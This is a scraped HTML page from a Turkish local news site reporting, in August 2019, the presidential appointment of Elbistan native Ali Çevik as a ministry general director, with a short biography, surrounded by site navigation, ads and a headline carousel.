src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/mavigross_1.jpg&w=980&h=300&q=90" width="980" height="300" style="width:980px;height: 300px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistanin-kuzey-aksinda-asfalt-calismalari-basladi-h63969.html" title="Elbistan’ın kuzey aksında asfalt çalışmaları başladı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/08/Ysimsiz-1_12.jpg" alt="Elbistan’ın kuzey aksında asfalt çalışmaları başladı" class="pull-left" /> <div class="caption-line"><p>Elbistan’ın kuzey aksında asfalt çalışmaları...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/0800-1800-arasi-cop-birakmak-yasak-h63961.html" title="08.00-18.00 arası çöp bırakmak yasak" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/08/Ysimsiz-1_11.jpg" alt="08.00-18.00 arası çöp bırakmak yasak" class="pull-left" /> <div class="caption-line"><p>08.00-18.00 arası çöp bırakmak yasak</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/uretici-ve-yatirimcilara-hibe-destekleri-anlatildi-h63958.html" title="Üretici ve yatırımcılara hibe destekleri anlatıldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/08/Ysimsiz-1_10.jpg" alt="Üretici ve yatırımcılara hibe destekleri anlatıldı" class="pull-left" /> <div class="caption-line"><p>Üretici ve yatırımcılara hibe destekleri...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/mahallelerine-taziye-evi-yaptirdilar-h63952.html" title="Mahallelerine taziye evi yaptırdılar" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/08/Ysimsiz-1_9.jpg" alt="Mahallelerine taziye evi yaptırdılar" class="pull-left" /> <div class="caption-line"><p>Mahallelerine taziye evi yaptırdılar</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-genel-cerrah-akin-tekin-dunya-tip-tarihine-gecti-h63950.html" title="Elbistanlı Genel Cerrah Akın Tekin, dünya tıp tarihine geçti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/08/Ysimsiz-1_8.jpg" alt="Elbistanlı Genel Cerrah Akın Tekin, dünya tıp tarihine geçti" class="pull-left" /> <div class="caption-line"><p>Elbistanlı Genel Cerrah Akın Tekin,...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><a href="http://www.elbistaninsesi.com/banner.php?id=138" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/d3828a49-816d-4767-9537-b7638eaab90f.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner138" /></a></div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı</h1> <h2 class="lead" itemprop="description"><strong> Cumhurbaşkanı Recep Tayyip Erdoğan’ın imzasıyla yayımlanan kararnameye göre, Aile, Çalışma ve Sosyal Hizmetler Bakanlığı Aile ve Toplum Hizmetleri Genel Müdürü Muhammet Örnek&#039;in yerine Elbistanlı Ali Çevik atandı.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2019-08-23 18:27:29" content="2019-08-23T18:27:29+02:00">23 Ağustos 2019 Cuma 18:27</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/cumhurbaskani_erdogan_elbistanli_ismi_genel_mudur_olarak_atadi_h63968_568e8.jpg" alt="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> <div class="reklam reklam133 haber"><a href="http://www.elbistaninsesi.com/banner.php?id=145" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/CREN_1.jpg&w=600&h=200&q=90" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner145" /></a></div> <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=143" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/mavigross_haber_ici_1.jpg&w=600&h=200&q=90" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner143" /></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Cumhurbaşkanı Recep Tayyip Erdoğan’ın imzasıyla yayımlanan atama ve görevden alma kararları Resmi Gazete’de yayımlandı. Aile, Çalışma ve Sosyal Hizmetler Bakanlığı Aile ve Toplum Hizmetleri Genel Müdürlüğü görevine Ali Çevik getirildi. İğde Mahallesi nüfusuna kayıtlı olan Çevik, birçok vakıfta da yönetim kurulu üyeliği gibi görevlerde de bulunuyor. </span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;"><o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;"><o:p>&#160;</o:p></span></span><b style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Ali Çevik kimdir?</span></b></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">1981-1984 yılları arasında lise eğitimini Elbistan Mükrimin Halil Lisesinde tamamlayan Çevik, 1992’de İstanbul Üniversitesi Siyasal Bilgiler Fakültesine girdi ve 1996 yılında mezun oldu. 1998’de Marmara Üniversitesi Orta doğu Araştırmaları Enstitüsü Siyasi Tarih ve Uluslararası İlişkiler ana bilim dalında Türkiye-Irak ve ABD ilişkileri Mastır yaptı. Milli Gençlik Vakfı, Siyaset akademisi, Türgev ve Nun Eğitim Kültür Vakfı gibi sivil toplum kuruluşlarında görev yaptı. Ortadoğu Vakfı mütevelli heyeti üyesi, Afrika Vakfı istişare kurulu üyesi ve Göç Araştırmaları Vakfı’nda genel sekreter olarak görevine devam etmektedir.</span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;"><o:p></o:p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-kuzey-aksinda-asfalt-calismalari-basladi-h63969.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/okullarin-acilis-ve-tatil-tarihleri-belli-oldu-h63967.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/polis-cakari-kullanan-surucuye-2-bin-4-lira-ceza-h63966.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ozel-belgede-sahtecilik-ve-dolandiricilik-iddiasi-1-tutuklama-h63965.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/once-otomobille-carpisti-sonra-motosiklete-carpti-1-yarali-h63964.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobille-hafif-ticari-arac-carpisti-1-yarali-h63963.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-sayardan-veda-h63962.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/0800-1800-arasi-cop-birakmak-yasak-h63961.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanli-genel-cerrah-akin-tekin-dunya-tip-tarihine-gecti-h63950.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demirden-buyuksehir-subesine-ziyaret-h63951.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/uretici-ve-yatirimcilara-hibe-destekleri-anlatildi-h63958.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ulu-camii-karsisindaki-metruk-binalar-yikiliyor-h63953.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/34-ulkeden-41-ogrenci-kahramanmarasta-h63957.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gazinolarin-yikilmasi-sahil-yolu-calismasina-hiz-katti-h63956.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/mahallelerine-taziye-evi-yaptirdilar-h63952.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/uc-iklimin-kesistigi-nokta-elbistan-h63949.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/umre-kayitlari-23-agustosta-basliyor-h63948.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/milletin-kapisi-vatandasin-hizmetinde-h63947.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/mesleki-acikogretim-lisesi-kayitlari-basladi-h63946.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ozdemir-elbistana-tip-fakultesi-acilmasi-icin-calisma-yapacagiz-h63945.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ciftcinin-elektrik-borcu-tbmmye-tasindi-h63944.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/11-kacak-avciya-idari-para-cezasi-kesildi-h63943.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-1-yarali-h63942.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/vali-ozkan-orman-yangin-riskleri-asgari-seviyede-h63938.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kuzey-aksinda-asfalt-calismalari-basladi-h63969.html" title="Elbistan’ın kuzey aksında asfalt çalışmaları başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/elbistanin_kuzey_aksinda_asfalt_calismalari_basladi_h63969_3a306.jpg" alt="Elbistan’ın kuzey aksında asfalt çalışmaları başladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ın kuzey aksında asfalt çalışmaları başladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html" title="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/cumhurbaskani_erdogan_elbistanli_ismi_genel_mudur_olarak_atadi_h63968_568e8.jpg" alt="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/okullarin-acilis-ve-tatil-tarihleri-belli-oldu-h63967.html" title="Okulların açılış ve tatil tarihleri belli oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/okullarin_acilis_ve_tatil_tarihleri_belli_oldu_h63967_4f560.jpg" alt="Okulların açılış ve tatil tarihleri belli oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Okulların açılış ve tatil tarihleri belli oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/polis-cakari-kullanan-surucuye-2-bin-4-lira-ceza-h63966.html" title="Polis çakarı kullanan sürücüye 2 bin 4 lira ceza"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/polis_cakari_kullanan_surucuye_2_bin_4_lira_ceza_h63966_72a16.jpg" alt="Polis çakarı kullanan sürücüye 2 bin 4 lira ceza" /> <div class="carousel-caption"> <h2> <span style="font-size:">Polis çakarı kullanan sürücüye 2 bin 4 lira ceza</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ozel-belgede-sahtecilik-ve-dolandiricilik-iddiasi-1-tutuklama-h63965.html" title="Özel belgede sahtecilik ve dolandırıcılık iddiası: 1 tutuklama"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/ozel_belgede_sahtecilik_ve_dolandiricilik_iddiasi_1_tutuklama_h63965_0baa9.jpg" alt="Özel belgede sahtecilik ve dolandırıcılık iddiası: 1 tutuklama" /> <div class="carousel-caption"> <h2> <span style="font-size:">Özel belgede sahtecilik ve dolandırıcılık iddiası: 1 tutuklama</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/once-otomobille-carpisti-sonra-motosiklete-carpti-1-yarali-h63964.html" title="Önce otomobille çarpıştı sonra motosiklete çarptı: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/once_otomobille_carpisti_sonra_motosiklete_carpti_1_yarali_h63964_385ee.jpg" alt="Önce otomobille çarpıştı sonra motosiklete çarptı: 1 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Önce otomobille çarpıştı sonra motosiklete çarptı: 1 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobille-hafif-ticari-arac-carpisti-1-yarali-h63963.html" title="Otomobille hafif ticari araç çarpıştı: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/otomobille_hafif_ticari_arac_carpisti_1_yarali_h63963_ba9df.jpg" alt="Otomobille hafif ticari araç çarpıştı: 1 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobille hafif ticari araç çarpıştı: 1 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-sayardan-veda-h63962.html" title="Kaymakam Sayar’dan veda"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/kaymakam_sayardan_veda_h63962_a46f3.jpg" alt="Kaymakam Sayar’dan veda" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Sayar’dan veda</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/0800-1800-arasi-cop-birakmak-yasak-h63961.html" title="08.00-18.00 arası çöp bırakmak yasak"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/0800_1800_arasi_cop_birakmak_yasak_h63961_3d8fb.jpg" alt="08.00-18.00 arası çöp bırakmak yasak" /> <div class="carousel-caption"> <h2> <span style="font-size:">08.00-18.00 arası çöp bırakmak yasak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanli-genel-cerrah-akin-tekin-dunya-tip-tarihine-gecti-h63950.html" title="Elbistanlı Genel Cerrah Akın Tekin, dünya tıp tarihine geçti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/elbistanli_genel_cerrah_akin_tekin_dunya_tip_tarihine_gecti_h63950_bbafb.jpg" alt="Elbistanlı Genel Cerrah Akın Tekin, dünya tıp tarihine geçti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanlı Genel Cerrah Akın Tekin, dünya tıp tarihine geçti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-buyuksehir-subesine-ziyaret-h63951.html" title="Kaymakam Demir’den Büyükşehir Şubesi’ne ziyaret"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/kaymakam_demirden_buyuksehir_subesine_ziyaret_h63951_7d113.jpg" alt="Kaymakam Demir’den Büyükşehir Şubesi’ne ziyaret" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir’den Büyükşehir Şubesi’ne ziyaret</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/uretici-ve-yatirimcilara-hibe-destekleri-anlatildi-h63958.html" title="Üretici ve yatırımcılara hibe destekleri anlatıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/uretici_ve_yatirimcilara_hibe_destekleri_anlatildi_h63958_58863.jpg" alt="Üretici ve yatırımcılara hibe destekleri anlatıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Üretici ve yatırımcılara hibe destekleri anlatıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ulu-camii-karsisindaki-metruk-binalar-yikiliyor-h63953.html" title="Ulu Camii karşısındaki metruk binalar yıkılıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/ulu_camii_karsisindaki_metruk_binalar_yikiliyor_h63953_e07fc.jpg" alt="Ulu Camii karşısındaki metruk binalar yıkılıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ulu Camii karşısındaki metruk binalar yıkılıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/34-ulkeden-41-ogrenci-kahramanmarasta-h63957.html" title="34 ülkeden 41 öğrenci Kahramanmaraş’ta"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/34_ulkeden_41_ogrenci_kahramanmarasta_h63957_347c3.jpg" alt="34 ülkeden 41 öğrenci Kahramanmaraş’ta" /> <div class="carousel-caption"> <h2> <span style="font-size:">34 ülkeden 41 öğrenci Kahramanmaraş’ta</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gazinolarin-yikilmasi-sahil-yolu-calismasina-hiz-katti-h63956.html" title="Gazinoların yıkılması, sahil yolu çalışmasına hız kattı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/gazinolarin_yikilmasi_sahil_yolu_calismasina_hiz_katti_h63956_b9f87.jpg" alt="Gazinoların yıkılması, sahil yolu çalışmasına hız kattı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gazinoların yıkılması, sahil yolu çalışmasına hız kattı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/mahallelerine-taziye-evi-yaptirdilar-h63952.html" title="Mahallelerine taziye evi yaptırdılar"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/mahallelerine_taziye_evi_yaptirdilar_h63952_87bd1.jpg" alt="Mahallelerine taziye evi yaptırdılar" /> <div class="carousel-caption"> <h2> <span style="font-size:">Mahallelerine taziye evi yaptırdılar</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/uc-iklimin-kesistigi-nokta-elbistan-h63949.html" title="Üç iklimin kesiştiği nokta Elbistan"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/uc_iklimin_kesistigi_nokta_elbistan_h63949_98134.jpg" alt="Üç iklimin kesiştiği nokta Elbistan" /> <div class="carousel-caption"> <h2> <span style="font-size:">Üç iklimin kesiştiği nokta Elbistan</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/umre-kayitlari-23-agustosta-basliyor-h63948.html" title="Umre kayıtları 23 Ağustos’ta başlıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/umre_kayitlari_23_agustosta_basliyor_h63948_44c8c.jpg" alt="Umre kayıtları 23 Ağustos’ta başlıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Umre kayıtları 23 Ağustos’ta başlıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/milletin-kapisi-vatandasin-hizmetinde-h63947.html" title="‘Milletin Kapısı’ vatandaşın hizmetinde"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/milletin_kapisi_vatandasin_hizmetinde_h63947_f2a4b.jpg" alt="‘Milletin Kapısı’ vatandaşın hizmetinde" /> <div class="carousel-caption"> <h2> <span style="font-size:">‘Milletin Kapısı’ vatandaşın hizmetinde</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/mesleki-acikogretim-lisesi-kayitlari-basladi-h63946.html" title="Mesleki açıköğretim lisesi kayıtları başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/mesleki_acikogretim_lisesi_kayitlari_basladi_h63946_9820a.jpg" alt="Mesleki açıköğretim lisesi kayıtları başladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Mesleki açıköğretim lisesi kayıtları başladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ozdemir-elbistana-tip-fakultesi-acilmasi-icin-calisma-yapacagiz-h63945.html" title="Özdemir: “Elbistan’a tıp fakültesi açılması için çalışma yapacağız”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/ozdemir_elbistana_tip_fakultesi_acilmasi_icin_calisma_yapacagiz_h63945_bef4b.jpg" alt="Özdemir: “Elbistan’a tıp fakültesi açılması için çalışma yapacağız”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Özdemir: “Elbistan’a tıp fakültesi açılması için çalışma yapacağız”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ciftcinin-elektrik-borcu-tbmmye-tasindi-h63944.html" title="Çiftçinin elektrik borcu TBMM’ye taşındı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/ciftcinin_elektrik_borcu_tbmmye_tasindi_h63944_7eee9.jpg" alt="Çiftçinin elektrik borcu TBMM’ye taşındı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çiftçinin elektrik borcu TBMM’ye taşındı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/11-kacak-avciya-idari-para-cezasi-kesildi-h63943.html" title="11 kaçak avcıya idari para cezası kesildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/11_kacak_avciya_idari_para_cezasi_kesildi_h63943_a583a.jpg" alt="11 kaçak avcıya idari para cezası kesildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">11 kaçak avcıya idari para cezası kesildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-1-yarali-h63942.html" title="Otomobil, elektrik direğine çarptı: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/otomobil_elektrik_diregine_carpti_1_yarali_h63942_a381d.jpg" alt="Otomobil, elektrik direğine çarptı: 1 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil, elektrik direğine çarptı: 1 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/vali-ozkan-orman-yangin-riskleri-asgari-seviyede-h63938.html" title="Vali Özkan: “Orman yangın riskleri asgari seviyede”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/08/vali_ozkan_orman_yangin_riskleri_asgari_seviyede_h63938_8a142.jpg" alt="Vali Özkan: “Orman yangın riskleri asgari seviyede”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Vali Özkan: “Orman yangın riskleri asgari seviyede”</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">4</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde 